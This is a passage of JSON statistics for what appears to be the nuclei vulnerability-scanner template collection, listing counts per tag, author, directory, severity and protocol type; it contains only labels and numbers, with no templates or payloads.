ount":1},{"name":"pippoint","count":1},{"name":"perl","count":1},{"name":"tamronos","count":1},{"name":"bigbluebutton","count":1},{"name":"gilacms","count":1},{"name":"roads","count":1},{"name":"geocode","count":1},{"name":"redwood","count":1},{"name":"dotnetnuke","count":1},{"name":"miscrsoft","count":1},{"name":"pacsone","count":1},{"name":"wmt","count":1},{"name":"details","count":1},{"name":"camunda","count":1},{"name":"cves2001","count":1},{"name":"mdb","count":1},{"name":"exposures","count":1},{"name":"shiro","count":1},{"name":"bolt","count":1},{"name":"meraki","count":1},{"name":"avtech","count":1},{"name":"graph","count":1},{"name":"ruckus","count":1},{"name":"elasticsearch","count":1},{"name":"manager","count":1},{"name":"deviantart","count":1},{"name":"linkedin","count":1},{"name":"webadmin","count":1},{"name":"parentlink","count":1},{"name":"woocommerce","count":1},{"name":"webmodule-ee","count":1},{"name":"auth","count":1},{"name":"kerbynet","count":1},{"name":"phalcon","count":1},{"name":"octobercms","count":1},{"name":"lg-nas","count":1},{"name":"websvn","count":1},{"name":"openerp","count":1},{"name":"landray","count":1},{"name":"sophos","count":1},{"name":"faraday","count":1},{"name":"ulterius","count":1},{"name":"flexbe","count":1},{"name":"maxsite","count":1},{"name":"jnoj","count":1},{"name":"zms","count":1},{"name":"webmin","count":1},{"name":"tjws","count":1},{"name":"twitter-server","count":1},{"name":"apiman","count":1},{"name":"emc","count":1},{"name":"burp","count":1},{"name":"mongoshake","count":1},{"name":"mediumish","count":1},{"name":"lanproxy","count":1},{"name":"key","count":1},{"name":"hiboss","count":1},{"name":"expn","count":1},{"name":"alertmanager","count":1},{"name":"xunchi","count":1},{"name":"phpfusion","count":1},{"name":"varnish","count":1},{"name":"achecker","count":1},{"name":"blackboard","count":1},{"name":"viewpoint","count":1},{"name":"checkpoint","count":1},{"name":"cofax","count":1},{"name":"argussurveillance","count":1},{"name":"fiori","count":1},{"name":"ems","count":1},{"name":"announcekit","count":1},{"name":"plone","count":1},{"name":"moin","count":1},{"name":"geutebruck","count":1},{"name":"gloo","count":1},{"name":"clusterengine","count":1},{"name":"listserv","count":1},{"name":"ioncube","count":1},{"name":"pagespeed","count":1},{"name":"webftp","count":1},{"name":"finereport","count":1},{"name":"eyelock","count":1},{"name":"cscart","count":1},{"name":"fastcgi","count":1},{"name":"exponentcms","count":1},{"name":"alerta","count":1},{"name":"comodo","count":1},{"name":"metinfo","count":1},{"name":"shoppable","count":1},{"name":"spotify","count":1},{"name":"bookstack","count":1},{"name":"tileserver","count":1},{"name":"hortonworks","count":1},{"name":"zte","count":1},{"name":"lotuscms","count":1},{"name":"frontpage","count":1},{"name":"cloud","count":1},{"name":"nomad","count":1},{"name":"ecom","count":1},{"name":"lutron","count":1},{"name":"mautic","count":1},{"name":"gitea","count":1},{"name":"fortiweb","count":1},{"name":"floc","count":1},{"name":"digitalocean","count":1},{"name":"hadoop","count":1},{"name":"playable","count":1},{"name":"bazarr","count":1},{"name":"linksys","count":1},{"name":"primetek","count":1},{"name":"database","count":1},{"name":"pmb","count":1},{"name":"clink-office","count":1},{"name":"vsphere","count":1},{"name":"embedthis","count":1},{"name":"jmx","count":1},{"name":"openemr","count":1},{"name":"postmark","count":1},{"name":"ns","count":1},{"name":"aura","count":1},{"name":"gurock","count":1},{"name":"office365","count":1},{"name":"redcap","count":1},{"name":"beanshell","count":1},{"name":"streetview","count":1},{"name":"sqlite","count":1},{"name":"tectuus","count":1},{"name":"svnserve","count":1},{"name":"soar","count":1},{"name":"fastapi","count":1},{"name":"mobileiron","count":1},{"name":"speed","count":1},{"name":"terraform","count":1},{"name":"dropbox","count":1},{"name":"mara","count":1},{"name":"eprints","count":1},{"name":"majordomo2","count":1},{"name":"electron","count":1},{"name":"elascticsearch","count":1},{"name":"blind","count":1},{"name":"redis","count":1},{"name":"pendo","count":1},{"name":"netmask","count":1},{"name":"zookeeper","count":1},{"name":"luftguitar","count":1},{"name":"jumpcloud","count":1},{"name":"wamp","count":1},{"name":"vnc","count":1},{"name":"vsftpd","count":1},{"name":"nuxeo","count":1},{"name":"gitlist","count":1},{"name":"geddy","count":1},{"name":"b2evolution","count":1},{"name":"biometrics","count":1},{"name":"elfinder","count":1},{"name":"doh","count":1},{"name":"yzmcms","count":1},{"name":"arl","count":1},{"name":"pagerduty","count":1},{"name":"kafdrop","count":1},{"name":"gsoap","count":1},{"name":"fortigate","count":1},{"name":"episerver","count":1},{"name":"rubedo","count":1},{"name":"instagram","count":1},{"name":"turbocrm","count":1},{"name":"eg","count":1},{"name":"rmi","count":1},{"name":"photo","count":1},{"name":"nps","count":1},{"name":"jsp","count":1},{"name":"scimono","count":1},{"name":"email","count":1},{"name":"spf","count":1},{"name":"bingmaps","count":1},{"name":"sendgrid","count":1},{"name":"autocomplete","count":1},{"name":"sourcebans","count":1},{"name":"messaging","count":1},{"name":"visionhub","count":1},{"name":"dotnet","count":1},{"name":"tor","count":1},{"name":"subrion","count":1},{"name":"myucms","count":1},{"name":" default-login","count":1},{"name":"rdp","count":1},{"name":"74cms","count":1},{"name":"sarg","count":1},{"name":"codeigniter","count":1},{"name":"crm","count":1},{"name":"package","count":1},{"name":"oscommerce","count":1},{"name":"ganglia","count":1},{"name":"clave","count":1},{"name":"travis","count":1},{"name":"centreon","count":1},{"name":"addpac","count":1},{"name":"drone","count":1},{"name":"azkaban","count":1},{"name":"chevereto","count":1},{"name":"iptime","count":1},{"name":"bullwark","count":1},{"name":"dompdf","count":1},{"name":"ambari","count":1},{"name":"spectracom","count":1},{"name":"dbeaver","count":1},{"name":"starttls","count":1},{"name":"flink","count":1},{"name":"secmail","count":1},{"name":"h3c-imc","count":1},{"name":"tieline","count":1},{"name":"cockpit","count":1},{"name":"woocomernce","count":1},{"name":"opensmtpd","count":1},{"name":"fcm","count":1},{"name":"xvr","count":1},{"name":"trilithic","count":1},{"name":"vscode","count":1},{"name":"smi","count":1},{"name":"whm","count":1},{"name":"sidekiq","count":1},{"name":"jitsi","count":1},{"name":"expressjs","count":1}],"authors":[{"name":"daffainfo","count":285},{"name":"pikpikcu","count":279},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":200},{"name":"geeknik","count":158},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":71},{"name":"princechaddha","count":64},{"name":"zzeitlin","count":63},{"name":"madrobot","count":61},{"name":"0x_akoko","count":44},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"johnk3r","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"skeltavik","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"idealphase","count":3},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"tess","count":3},{"name":"unstabl3","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"vsh00t","count":3},{"name":"mavericknerd","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"jarijaas","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"r12w4n","count":2},{"name":"koti2","count":2},{"name":"bp0lr","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"0xprial","count":2},{"name":"parth","count":2},{"name":"ehsahil","count":2},{"name":"0xrudra","count":2},{"name":"ree4pwn","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"manas_harsh","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"udit_thakkur","count":2},{"name":"alifathi-h1","count":2},{"name":"nkxxkn","count":2},{"name":"hetroublemakr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"0xsmiley","count":2},{"name":"pxmme1337","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"vavkamil","count":2},{"name":"cocxanh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"x1m_martijn","count":2},{"name":"randomrobbie","count":2},{"name":"lotusdll","count":2},{"name":"bernardofsr","count":2},{"name":"moritz nentwig","count":2},{"name":"convisoappsec","count":2},{"name":"w4cky_","count":2},{"name":"hahwul","count":2},{"name":"zomsop82","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"whoever","count":2},{"name":"johnjhacking","count":2},{"name":"swissky","count":2},{"name":"me9187","count":2},{"name":"bsysop","count":2},{"name":"g4l1t0","count":2},{"name":"bing0o","count":2},{"name":"socketz","count":2},{"name":"gal nagli","count":2},{"name":"0xcrypto","count":2},{"name":"arcc","count":2},{"name":"afaq","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"knassar702","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"ahmed sherif","count":1},{"name":"shelld3v","count":1},{"name":"ipanda","count":1},{"name":"furkansenan","count":1},{"name":"jeya seelan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"fopina","count":1},{"name":"mass0ma","count":1},{"name":"yashgoti","count":1},{"name":"absshax","count":1},{"name":"d0rkerdevil","count":1},{"name":"akshansh","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"toufik airane","count":1},{"name":"mhdsamx","count":1},{"name":"j33n1k4","count":1},{"name":"sickwell","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"borna nematzadeh","count":1},{"name":"c3l3si4n","count":1},{"name":"undefl0w","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"affix","count":1},{"name":"ooooooo_q","count":1},{"name":"zandros0","count":1},{"name":"push4d","count":1},{"name":"kareemse1im","count":1},{"name":"bjhulst","count":1},{"name":"manuelbua","count":1},{"name":"evolutionsec","count":1},{"name":"hanlaomo","count":1},{"name":"0xteles","count":1},{"name":"thebinitghimire","count":1},{"name":"pdp","count":1},{"name":"_c0wb0y_","count":1},{"name":"smaranchand","count":1},{"name":"flag007","count":1},{"name":"andirrahmani1","count":1},{"name":"raesene","count":1},{"name":"0h1in9e","count":1},{"name":"petruknisme","count":1},{"name":"b0yd","count":1},{"name":"adrianmf","count":1},{"name":"_darrenmartyn","count":1},{"name":"qlkwej","count":1},{"name":"streetofhackerr007","count":1},{"name":"b0rn2r00t","count":1},{"name":"izn0u","count":1},{"name":"udyz","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"berkdusunur","count":1},{"name":"blckraven","count":1},{"name":"elouhi","count":1},{"name":"ahmetpergamum","count":1},{"name":"cookiehanhoan","count":1},{"name":"tirtha_mandal","count":1},{"name":"pratik khalane","count":1},{"name":"patralos","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"x6263","count":1},{"name":"gboddin","count":1},{"name":"apt-mirror","count":1},{"name":"nerrorsec","count":1},{"name":"elder tao","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"thevillagehacker","count":1},{"name":"notsoevilweasel","count":1},{"name":"mesaglio","count":1},{"name":"makyotox","count":1},{"name":"philippdelteil","count":1},{"name":"forgedhallpass","count":1},{"name":"_harleo","count":1},{"name":"sy3omda","count":1},{"name":"ilovebinbash","count":1},{"name":"xstp","count":1},{"name":"infosecsanyam","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"becivells","count":1},{"name":"hakluke","count":1},{"name":"retr0","count":1},{"name":"schniggie","count":1},{"name":"tim_koopmans","count":1},{"name":"akash.c","count":1},{"name":"ajaysenr","count":1},{"name":"bolli95","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"shreyapohekar","count":1},{"name":"ohlinge","count":1},{"name":"b4uh0lz","count":1},{"name":"droberson","count":1},{"name":"pudsec","count":1},{"name":"wabafet","count":1},{"name":"th3.d1p4k","count":1},{"name":"willd96","count":1},{"name":"sicksec","count":1},{"name":"alex","count":1},{"name":"exploitation","count":1},{"name":"rotemreiss","count":1},{"name":"brabbit10","count":1},{"name":"un-fmunozs","count":1},{"name":"kabirsuda","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"kre80r","count":1},{"name":"alph4byt3","count":1},{"name":"aresx","count":1},{"name":"52971","count":1},{"name":"regala_","count":1},{"name":"iampritam","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"bad5ect0r","count":1},{"name":"kurohost","count":1},{"name":"remonsec","count":1},{"name":"jteles","count":1},{"name":"thezakman","count":1},{"name":"yavolo","count":1},{"name":"soyelmago","count":1},{"name":"noamrathaus","count":1},{"name":"rojanrijal","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"dawid-czarnecki","count":1},{"name":"clarkvoss","count":1},{"name":"intx0x80","count":1},{"name":"zhenwarx","count":1},{"name":"juicypotato1","count":1},{"name":"ringo","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"taielab","count":1},{"name":"daviey","count":1},{"name":"jrolf","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"chron0x","count":1},{"name":"s1r1u5_","count":1},{"name":"oscarintherocks","count":1},{"name":"its0x08","count":1},{"name":"mubassirpatel","count":1},{"name":"naglinagli","count":1},{"name":"shifacyclewla","count":1},{"name":"elmahdi","count":1},{"name":"0ut0fb4nd","count":1},{"name":"omarkurt","count":1},{"name":"sshell","count":1},{"name":"co0nan","count":1},{"name":"mah3sec_","count":1},{"name":"revblock","count":1},{"name":"sec_hawk","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"whynotke","count":1},{"name":"@dwisiswant0","count":1},{"name":"defr0ggy","count":1},{"name":"andysvints","count":1},{"name":"0xrod","count":1},{"name":"fmunozs","count":1}],"directory":[{"name":"cves","count":818},{"name":"vulnerabilities","count":312},{"name":"exposed-panels","count":255},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":137},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":57},{"name":"file","count":48},{"name":"workflows","count":37},{"name":"network","count":32},{"name":"iot","count":26},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":732},{"name":"high","count":631},{"name":"medium","count":465},{"name":"critical","count":282},{"name":"low","count":155}],"types":[{"name":"http","count":2155},{"name":"file","count":48},{"name":"network","count":45},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":818},{"name":"lfi","count":330},{"name":"panel","count":259},{"name":"xss","count":256},{"name":"wordpress","count":245},{"name":"exposure","count":239},{"name":"rce","count":204},{"name":"tech","count":193},{"name":"wp-plugin","count":170},{"name":"cve2020","count":164},{"name":"cve2021","count":151},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":87},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"iot","count":68},{"name":"token","count":67},{"name":"default-login","count":66},{"name":"token-spray","count":63},{"name":"oob","count":59},{"name":"cve2017","count":50},{"name":"file","count":49},{"name":"unauth","count":47},{"name":"network","count":43},{"name":"sqli","count":40},{"name":"ssrf","count":40},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":29},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"cve2015","count":26},{"name":"generic","count":24},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"auth-bypass","count":23},{"name":"cisco","count":22},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"devops","count":13},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"backup","count":8},{"name":"airflow","count":8},{"name":"ibm","count":8},{"name":"cnvd","count":8},{"name":"nginx","count":8},{"name":"microsoft","count":8},{"name":"cve2008","count":8},{"name":"scada","count":8},{"name":"rails","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"cms","count":7},{"name":"kubernetes","count":7},{"name":"hp","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"jetty","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"fileupload","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"nodejs","count":6},{"name":"laravel","count":6},{"name":"lucee","count":6},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"deserialization","count":5},{"name":"phpmyadmin","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"drupal","count":5},{"name":"jolokia","count":5},{"name":"crlf","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"magmi","count":4},{"name":"exchange","count":4},{"name":"hongdian","count":4},{"name":"strapi","count":4},{"name":"asp","count":4},{"name":"amazon","count":4},{"name":"git","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"webserver","count":4},{"name":"symantec","count":4},{"name":"symfony","count":4},{"name":"rfi","count":4},{"name":"thinkphp","count":4},{"name":"firebase","count":4},{"name":"thinkcmf","count":4},{"name":"maps","count":4},{"name":"traversal","count":4},{"name":"slack","count":4},{"name":"buffalo","count":4},{"name":"grafana","count":4},{"name":"zabbix","count":4},{"name":"vpn","count":4},{"name":"samsung","count":4},{"name":"fatpipe","count":4},{"name":"glpi","count":4},{"name":"resin","count":4},{"name":"zimbra","count":4},{"name":"proxy","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"npm","count":4},{"name":"elastic","count":4},{"name":"solarwinds","count":4},{"name":"cve2007","count":3},{"name":"vbulletin","count":3},{"name":"github","count":3},{"name":"bitrix","count":3},{"name":"kevinlab","count":3},{"name":"ofbiz","count":3},{"name":"lfr","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"smtp","count":3},{"name":"hoteldruid","count":3},{"name":"openssh","count":3},{"name":"itop","count":3},{"name":"kibana","count":3},{"name":"microstrategy","count":3},{"name":"linkerd","count":3},{"name":"jeesns","count":3},{"name":"fanruan","count":3},{"name":"fpd","count":3},{"name":"nosqli","count":3},{"name":"druid","count":3},{"name":"ebs","count":3},{"name":"search","count":3},{"name":"node","count":3},{"name":"targa","count":3},{"name":"nacos","count":3},{"name":"zhiyuan","count":3},{"name":"httpd","count":3},{"name":"cacti","count":3},{"name":"telerik","count":3},{"name":"backdoor","count":3},{"name":"azure","count":3},{"name":"mongodb","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"caucho","count":3},{"name":"openam","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"kafka","count":3},{"name":"oa","count":3},{"name":"tikiwiki","count":3},{"name":"injection","count":3},{"name":"ssh","count":3},{"name":"terramaster","count":3},{"name":"mail","count":3},{"name":"cves","count":3},{"name":"opensis","count":3},{"name":"springcloud","count":3},{"name":"grav","count":2},{"name":"activemq","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"glassfish","count":2},{"name":"voipmonitor","count":2},{"name":"commax","count":2},{"name":"text","count":2},{"name":"netsweeper","count":2},{"name":"totemomail","count":2},{"name":"aviatrix","count":2},{"name":"kentico","count":2},{"name":"frp","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"chamilo","count":2},{"name":"plesk","count":2},{"name":"mailchimp","count":2},{"name":"tidb","count":2},{"name":"wuzhicms","count":2},{"name":"openfire","count":2},{"name":"nextjs","count":2},{"name":"bruteforce","count":2},{"name":"payara","count":2},{"name":"oauth","count":2},{"name":"bucket","count":2},{"name":"globalprotect","count":2},{"name":"embed","count":2},{"name":"vrealize","count":2},{"name":"service","count":2},{"name":"akkadian","count":2},{"name":"ecoa","count":2},{"name":"odoo","count":2},{"name":"wordfence","count":2},{"name":"couchdb","count":2},{"name":"bitly","count":2},{"name":"sonicwall","count":2},{"name":"heroku","count":2},{"name":"liferay","count":2},{"name":"flir","count":2},{"name":"sonarqube","count":2},{"name":"jsf","count":2},{"name":"chyrp","count":2},{"name":"minio","count":2},{"name":"ec2","count":2},{"name":"waf","count":2},{"name":"qihang","count":2},{"name":"harbor","count":2},{"name":"showdoc","count":2},{"name":"ecology","count":2},{"name":"natshell","count":2},{"name":"justwriting","count":2},{"name":"upload","count":2},{"name":"jboss","count":2},{"name":"prtg","count":2},{"name":"nagios","count":2},{"name":"icewarp","count":2},{"name":"webcam","count":2},{"name":"sitecore","count":2},{"name":"nextcloud","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"smb","count":2},{"name":"splunk","count":2},{"name":"geowebserver","count":2},{"name":"bypass","count":2},{"name":"saltstack","count":2},{"name":"hashicorp","count":2},{"name":"guacamole","count":2},{"name":"status","count":2},{"name":"netis","count":2},{"name":"kong","count":2},{"name":"qcubed","count":2},{"name":"prestashop","count":2},{"name":"enumeration","count":2},{"name":"linux","count":2},{"name":"idrac","count":2},{"name":"dolibarr","count":2},{"name":"aruba","count":2},{"name":"storage","count":2},{"name":"rockmongo","count":2},{"name":"yii","count":2},{"name":"hostheader-injection","count":2},{"name":"openvpn","count":2},{"name":"axis","count":2},{"name":"db","count":2},{"name":"seeyon","count":2},{"name":"ucmdb","count":2},{"name":"trixbox","count":2},{"name":"cache","count":2},{"name":"hjtcloud","count":2},{"name":"fortios","count":2},{"name":"xxljob","count":2},{"name":"horde","count":2},{"name":"jeedom","count":2},{"name":"backups","count":2},{"name":"avantfax","count":2},{"name":"vcenter","count":2},{"name":"axis2","count":2},{"name":"emerge","count":2},{"name":"cve2005","count":2},{"name":"hasura","count":2},{"name":"hpe","count":2},{"name":"paloalto","count":2},{"name":"pega","count":2},{"name":"huawei","count":2},{"name":"middleware","count":2},{"name":"mida","count":2},{"name":"mcafee","count":2},{"name":"phpcollab","count":2},{"name":"s3","count":2},{"name":"keycloak","count":2},{"name":"getsimple","count":2},{"name":"places","count":2},{"name":"chiyu","count":2},{"name":"igs","count":2},{"name":"rstudio","count":2},{"name":"yapi","count":2},{"name":"favicon","count":2},{"name":"dos","count":2},{"name":"sharepoint","count":2},{"name":"adminer","count":2},{"name":"timeclock","count":1},{"name":"rubedo","count":1},{"name":"mobileiron","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"maxsite","count":1},{"name":"elascticsearch","count":1},{"name":"wavlink","count":1},{"name":"timezone","count":1},{"name":"k8s","count":1},{"name":"jaspersoft","count":1},{"name":"centos","count":1},{"name":"bigbluebutton","count":1},{"name":"directions","count":1},{"name":"streetview","count":1},{"name":"haproxy","count":1},{"name":"redmine","count":1},{"name":"htmli","count":1},{"name":"sprintful","count":1},{"name":"redhat","count":1},{"name":"tapestry","count":1},{"name":"influxdb","count":1},{"name":"nsasg","count":1},{"name":"finereport","count":1},{"name":"octoprint","count":1},{"name":"beanshell","count":1},{"name":"ulterius","count":1},{"name":"discord","count":1},{"name":"xml","count":1},{"name":"solman","count":1},{"name":"tileserver","count":1},{"name":"interlib","count":1},{"name":"sar2html","count":1},{"name":"sidekiq","count":1},{"name":"owasp","count":1},{"name":"dotnet","count":1},{"name":"zenario","count":1},{"name":"biometrics","count":1},{"name":"gitea","count":1},{"name":"linkedin","count":1},{"name":"tensorboard","count":1},{"name":"trane","count":1},{"name":"digitalocean","count":1},{"name":"daybyday","count":1},{"name":"embedthis","count":1},{"name":"landray","count":1},{"name":"eyou","count":1},{"name":"cse","count":1},{"name":"werkzeug","count":1},{"name":"setup","count":1},{"name":"sgp","count":1},{"name":"whm","count":1},{"name":"webadmin","count":1},{"name":"upnp","count":1},{"name":"avtech","count":1},{"name":"dbeaver","count":1},{"name":"arl","count":1},{"name":"visionhub","count":1},{"name":"esmtp","count":1},{"name":"tjws","count":1},{"name":"glowroot","count":1},{"name":"apiman","count":1},{"name":"elasticsearch","count":1},{"name":"javascript","count":1},{"name":"zarafa","count":1},{"name":"weather","count":1},{"name":"wifisky","count":1},{"name":"mediumish","count":1},{"name":"openx","count":1},{"name":"gateone","count":1},{"name":"pyramid","count":1},{"name":"shopizer","count":1},{"name":"couchbase","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"plone","count":1},{"name":"clockwork","count":1},{"name":"subrion","count":1},{"name":"openemr","count":1},{"name":"hiawatha","count":1},{"name":"phpshowtime","count":1},{"name":"acontent","count":1},{"name":"gridx","count":1},{"name":"alibaba","count":1},{"name":"openstack","count":1},{"name":"rujjie","count":1},{"name":"scs","count":1},{"name":"octobercms","count":1},{"name":"graphql","count":1},{"name":"ssltls","count":1},{"name":"saltapi","count":1},{"name":"szhe","count":1},{"name":"imap","count":1},{"name":"zookeeper","count":1},{"name":"myvuehelp","count":1},{"name":"episerver","count":1},{"name":"emc","count":1},{"name":"sendgrid","count":1},{"name":"ioncube","count":1},{"name":"okiko","count":1},{"name":"qsan","count":1},{"name":"logontracer","count":1},{"name":"duomicms","count":1},{"name":"expn","count":1},{"name":"roads","count":1},{"name":"pagerduty","count":1},{"name":"visualtools","count":1},{"name":"fuelcms","count":1},{"name":"memcached","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"zyxel","count":1},{"name":"lotus","count":1},{"name":"csod","count":1},{"name":"photo","count":1},{"name":"ipstack","count":1},{"name":"tika","count":1},{"name":"graphite","count":1},{"name":"apos","count":1},{"name":"tpshop","count":1},{"name":"gilacms","count":1},{"name":"webui","count":1},{"name":"ems","count":1},{"name":"bedita","count":1},{"name":"xampp","count":1},{"name":"sureline","count":1},{"name":"kyan","count":1},{"name":"comodo","count":1},{"name":"tor","count":1},{"name":"square","count":1},{"name":"karel","count":1},{"name":"redwood","count":1},{"name":"sqlite","count":1},{"name":"lutron","count":1},{"name":"nuuo","count":1},{"name":"sangfor","count":1},{"name":"spotify","count":1},{"name":"lanproxy","count":1},{"name":"jmx","count":1},{"name":"addpac","count":1},{"name":"flink","count":1},{"name":"ecom","count":1},{"name":"oscommerce","count":1},{"name":"geddy","count":1},{"name":"default","count":1},{"name":"blind","count":1},{"name":"lancom","count":1},{"name":"weiphp","count":1},{"name":"place","count":1},{"name":"checkpoint","count":1},{"name":"monitorix","count":1},{"name":"motorola","count":1},{"name":"jsp","count":1},{"name":"phpwiki","count":1},{"name":"dompdf","count":1},{"name":"labtech","count":1},{"name":"gsoap","count":1},{"name":"shiro","count":1},{"name":"playable","count":1},{"name":"rmc","count":1},{"name":"details","count":1},{"name":"panabit","count":1},{"name":"eyelock","count":1},{"name":"email","count":1},{"name":"tongda","count":1},{"name":"dom","count":1},{"name":"oneblog","count":1},{"name":"gotmls","count":1},{"name":"shopware","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"axiom","count":1},{"name":"springframework","count":1},{"name":"mirai","count":1},{"name":"concrete","count":1},{"name":"circle","count":1},{"name":"fedora","count":1},{"name":"vsphere","count":1},{"name":"ghost","count":1},{"name":"listserv","count":1},{"name":"chevereto","count":1},{"name":"gstorage","count":1},{"name":"mariadb","count":1},{"name":"realteo","count":1},{"name":"linksys","count":1},{"name":"newrelic","count":1},{"name":"mpsec","count":1},{"name":"tieline","count":1},{"name":"cloudflare","count":1},{"name":"idemia","count":1},{"name":"webmodule-ee","count":1},{"name":"sentry","count":1},{"name":"acme","count":1},{"name":"webftp","count":1},{"name":"phpunit","count":1},{"name":"clave","count":1},{"name":"twitter-serve